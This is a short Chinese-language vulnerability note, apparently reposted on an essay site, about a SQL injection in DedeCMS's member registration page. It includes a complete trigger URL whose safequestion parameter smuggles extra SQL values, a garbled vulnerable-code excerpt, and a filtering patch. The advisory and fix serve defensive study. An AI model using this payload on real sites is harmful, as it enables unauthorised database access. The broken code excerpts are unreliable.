1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > 织梦DedeCMS /member/reg_new.php SQL注入漏洞

织梦DedeCMS /member/reg_new.php SQL注入漏洞

时间:2021-05-24 22:39:39

相关推荐

织梦DedeCMS /member/reg_new.php SQL注入漏洞

1. 漏洞描述

Dedecms会员中心注入漏洞

2. 漏洞触发条件

/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%&safequestion=1,1111111111111,1389701121,127.0.0.1,1389701121,127.0.0.1),(个人,user(),4297f44b13955235245b2497399d7a93,12as11111111111111111d13123,\,10,,1213asd11111111111123@,100, ,-10,\,1&safeanswer=1111111111111&sex=&vdcode=slum&agree=//把vdcode=slum改成当前的验证码

3. 漏洞影响范围

4. 漏洞代码分析

/member/reg_new.php

..$jointime = time();$logintime = time();$joinip = GetIP();$loginip = GetIP();$pwd = md5($userpwd); $spaceSta = ($cfg_mb_spacesta ExecuteNoneQuery($inQuery))..

5. 防御方法

/member/reg_new.php

..$jointime = time();$logintime = time();$joinip = GetIP();$loginip = GetIP();$pwd = md5($userpwd);/* 对$mtype | $safeanswer | $safequestion进行有效过滤 */ $mtype = HtmlReplace($mtype,1); $safeanswer = HtmlReplace($safeanswer); $safequestion = HtmlReplace($safequestion);/* */$spaceSta = ($cfg_mb_spacesta ExecuteNoneQuery($inQuery)){..

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。